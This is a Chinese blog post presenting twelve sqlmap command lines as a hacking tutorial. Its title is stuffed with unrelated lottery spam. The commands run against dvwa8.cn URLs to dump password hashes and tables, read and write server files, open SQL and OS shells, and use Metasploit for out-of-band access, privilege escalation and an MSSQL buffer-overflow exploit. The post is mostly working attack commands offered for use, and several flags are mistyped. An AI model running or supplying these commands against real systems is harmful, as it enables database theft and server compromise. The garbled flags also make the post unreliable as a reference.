双色球连码走势图:Sqlmap实战教程(共12种Sql注入演示例子)

连码四七靠三活猜生肖 www.dvwa8.cn 相信很多都知道Sqlmap,但是却不知道如何通过sqlmap来注入对吗?

今天将实战教大家如何真正的使用sqlmap来注入?只要知道这12种方法,包你只需要使用Sqlmap这一个工具掌握这12种用法就能打遍天下无敌手;sqlmqp注入

 

Sqlmap注入使用方法1:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mysql/get_int.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0

-u? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

-f? ? ? ? ? ? ? ? ? ? ? ? ? 广泛指纹后端DBMS

-b? ? ? ? ? ? ? ? ? ? ? ? ?检索DBMS横幅

--current-user? ? ? 检索当前会话用户

--current-db? ? ? ? ?检索当前数据库

--users? ? ? ? ? ? ? ? ?枚举数据库用户

--passwords? ? ? ? ?枚举数据库用户密码散列

--dbs? ? ? ? ? ? ? ? ? ? 枚举可用的数据库

-v VERBOSE? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法2:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/oracle/get_int.php?id=1 -b --passwords -U CU --union-use -v 2

-u? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

-b? ? ? ? ? ? ? ? ? ? ? ? ?检索DBMS横幅

--passwords? ? ? ? ?枚举数据库用户密码散列

-U? ? ? ? ? ? ? ? ? ? ? ? ?指定数据库用户(cu,当前用户的别名)

--unlon-use? ? ? ? ?如果可能,通过联合查询sql注入检索数据

-v VERBOSE? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法3:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mssql/iis/get_str2.asp?name=fujieace --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2

-u? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--dump? ? ? ? ? ? ? ? 打印表项

-T? ? ? ? ? ? ? ? ? ? ? ? ?打印表(users)

-C? ? ? ? ? ? ? ? ? ? ? ? ?打印列(surname)

--start? ? ? ? ? ? ? ? ? 第一个项输入(2,第二个表格顶部)

--stop? ? ? ? ? ? ? ? ? 最后一项输入(3,第三个表格顶部)

-v VERBOSE? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法4:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/pgsql/get_int.php?id=1 --dump -C 'user.pass' -v 1 --exclude-sysdbs

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--dump? ? ? ? ? ? ? ? ? ? ? 打印表项

-C? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?打印列(user.pass)

-v VERBOSE? ? ? ? ? ? ? ? 详细程度级别:0-6(默认值1)

--exclude-sysdbs? ? ? ?lgnore系统数据库(e.g.information_schema)

 

注意:没有提供table名(-T选项)

 

Sqlmap注入使用方法5:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/oracle/get_int.php?id=1 --sql-shell -v 2

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--sql-shell? ? ? ? ? ? ? ? ? 产生一个交互式的sql shell

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法6:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mssql/iis/get_int.asp?id=1 --read-file "c:\example.txt" -v 2

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--read-file? ? ? ? ? ? ? ? ?文件以从底层文件系统读取

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法7:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--write-file? ? ? ? ? ? ? ? 文件上传到底层文件系统(/ etc / passwd)

--dest-file? ? ? ? ? ? ? ? ? 绝对文件系统路径写入(/ tmp / writetest)

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法8:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/pgsql/get_int.php?id=1 --os-cmd "id" -v 1

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?目标地址

--os-cmd? ?操作系统命令执行(id)

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法9:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mysql/get_int.aspx?id=1 --os-shell -v 1 --union-use

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 目标地址

--os-shell? ? ? ? ? ? ? ? ? 生成交互式命令提示符

---union-usea? ? ? ? ? ?如果可能的话,通过联合查询SQL注入使用petrieve数据

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

 

Sqlmap注入使用方法10:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/pgsql/iis/get_int.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 目标地址

--os-pwn? ? ? ? ? ? ? ? ? 建立用户和数据库服务器之间的带外连接

--msf-path? ? ? ? ? ? ? ? metasploit文件系统路径(/home/inquis/software/metasploit)

--prive-esc? ? ? ? ? ? ? ? 尝试将数据库进程的用户权限提升到系统

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法11:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mysql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 目标地址

--os-pwn? ? ? ? ? ? ? ? ? 建立用户和数据库服务器之间的带外连接

--msf-path? ? ? ? ? ? ? ? metasploit文件系统路径(/home/inquis/software/metasploit)

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

 

Sqlmap注入使用方法12:

python /usr/bin/sqlmap.py -u //www.dvwa8.cn/mssql/iis/get_int.asp?id=1 --os-bof -v 1 --mst-path ~/software/metasploit

-u? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 目标地址

--os-bof? ? ? ? ? ? ? ? ? ? 通过利用微软sql服务器缓冲区溢出(MS09-04)建立用户和数据库服务器之间的带外连接,

--msf-path? ? ? ? ? ? ? ? metasploit文件系统路径(/home/inquis/software/metasploit)

-v VERBOSE? ? ? ? ? ? ? ?详细程度级别:0-6(默认值1)

    A+
发布日期:2018年04月27日  所属分类:黑客技术
最后修改时间:2018-04-27 21:00
评分: (3 票;平均数5.00 ;最高评分 5 ;用户总数3;总得分 15;百分比100.00)
标签:
付杰
wordpress discux dedecms 帝国 phpcms等快速建站服务
wordpress discux dedecms 帝国 phpcms等快速建站服务
  • ¥ 99.9元
  • 市场价:499.9元
永久免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
永久免费SSL证书服务 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元
wordpress站群服务 泛解析二级域名站群 二级目录站群
wordpress站群服务 泛解析二级域名站群 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
PHP运行环境 Wamp Lamp Lnmp 安装、配置、搭建服务
PHP运行环境 Wamp Lamp Lnmp 安装、配置、搭建服务
  • ¥ 9.9元
  • 市场价:49.9元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:2   其中:访客  1   博主  1

  1. 小呆 1

    工具是不错,但是sql注入点不太好找??!现在好多网站都不用动态了,不是规则就是路由。




    0



    0